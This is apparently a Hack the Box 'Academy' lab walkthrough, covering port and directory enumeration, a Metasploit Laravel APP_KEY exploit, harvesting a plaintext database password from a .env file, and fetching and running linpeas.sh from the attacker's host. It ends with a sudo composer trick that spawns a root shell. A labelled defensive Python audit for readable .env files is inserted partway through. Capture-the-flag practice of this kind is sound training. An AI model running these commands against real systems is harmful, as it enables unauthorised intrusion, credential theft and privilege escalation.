Hack the Box — Academy

Reconnaissance

sudo nmap -sC -sV -O -p- -oA nmap/nmap 10.10.10.215
....
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
....
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Did not follow redirect to http://academy.htb/
33060/tcp open mysqlx?
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
....

Enumeration

10.10.10.215    academy.htb
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://academy.htb
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://academy.htb
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/12/06 11:59:38 Starting gobuster
===============================================================
/images (Status: 301)
....
gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://academy.htb -x php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://academy.htb
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/12/06 12:03:59 Starting gobuster
===============================================================
/home.php (Status: 302)
/images (Status: 301)
/login.php (Status: 200)
/register.php (Status: 200)
/index.php (Status: 200)
/admin.php (Status: 200)
/config.php (Status: 200)
....
10.10.10.215    academy.htb dev-staging-01.academy.htb

Initial Foothold

searchsploit -m 47129.rb
msfconsole -q
set APP_KEY "dBLUaMuZz7Iq06XtL/Xnz/90Ejq+DEEynggqubHWFj0="
set RHOSTS 10.10.10.215
set VHOST dev-staging-01.academy.htb
set LHOST 10.10.14.8

Privilege Escalation

python3 -c 'import pty; pty.spawn("/bin/bash")'

www-data -> cry0l1t3

www-data@academy:/var/www/html/academy$ ls -la
ls -la
total 344
drwxr-xr-x 12 www-data www-data 4096 Dec 4 23:28 .
drwxr-xr-x 4 root root 4096 Aug 13 12:36 ..
-rw-r--r-- 1 www-data www-data 706 Aug 13 12:42 .env
-rw-r--r-- 1 www-data www-data 651 Feb 7 2018 .env.example
www-data@academy:/var/www/html/academy$ cat .env
....
DB_CONNECTION=mysql
DB_HOST=127.0.0.1
DB_PORT=3306
DB_DATABASE=academy
DB_USERNAME=dev
DB_PASSWORD=mySup3rP4s5w0rd!!
www-data@academy:/var/www/html/academy$ locate user.txt
locate user.txt
/home/cry0l1t3/user.txt
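
The listing above shows .env at mode 644 with DB_PASSWORD inside it. The following audit is an added example, not part of the original write-up: it walks a web root and reports .env* files that hold secret-looking keys and are readable by group or other. The key-name pattern and the function names are assumptions.

```python
import os
import re
import stat
import sys

# Key names treated as secrets (an assumption; extend for your application).
SECRET_KEY_RE = re.compile(r"PASSWORD|SECRET|TOKEN|APP_KEY|API_KEY", re.I)


def secret_keys(path):
    """Return names of secret-looking keys that have a non-empty value."""
    found = []
    with open(path, encoding="utf-8", errors="replace") as fh:
        for line in fh:
            line = line.strip()
            if not line or line.startswith("#") or "=" not in line:
                continue
            key, value = line.split("=", 1)
            value = value.strip().strip("'\"")
            if value and SECRET_KEY_RE.search(key):
                found.append(key.strip())  # report the key name, never the value
    return found


def audit(root):
    """Find .env* files under root that hold secrets and are group/other readable."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.startswith(".env"):
                continue
            path = os.path.join(dirpath, name)
            try:
                st = os.stat(path)
                if not stat.S_ISREG(st.st_mode):
                    continue
                keys = secret_keys(path)
            except OSError:
                continue  # unreadable file or dangling symlink
            mode = stat.S_IMODE(st.st_mode)
            if keys and mode & (stat.S_IRGRP | stat.S_IROTH):
                findings.append((path, oct(mode), keys))
    return findings


if __name__ == "__main__":
    for path, mode, keys in audit(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(f"{path} mode={mode} secrets={','.join(keys)}")
```

In the listing above the file is owned by www-data, the account the shell is running as, so a tighter mode only limits exposure to other local users and does not protect the secrets once the web application itself is compromised.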

cry0l1t3 -> mrb3n

python -m SimpleHTTPServer 5555
wget http://10.10.14.8:5555/linpeas.sh
chmod +x linpeas.sh
./linpeas.sh

mrb3n -> root

sudo -l
TF=$(mktemp -d)
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' >$TF/composer.json
sudo composer --working-dir=$TF run-script x

Lessons Learned
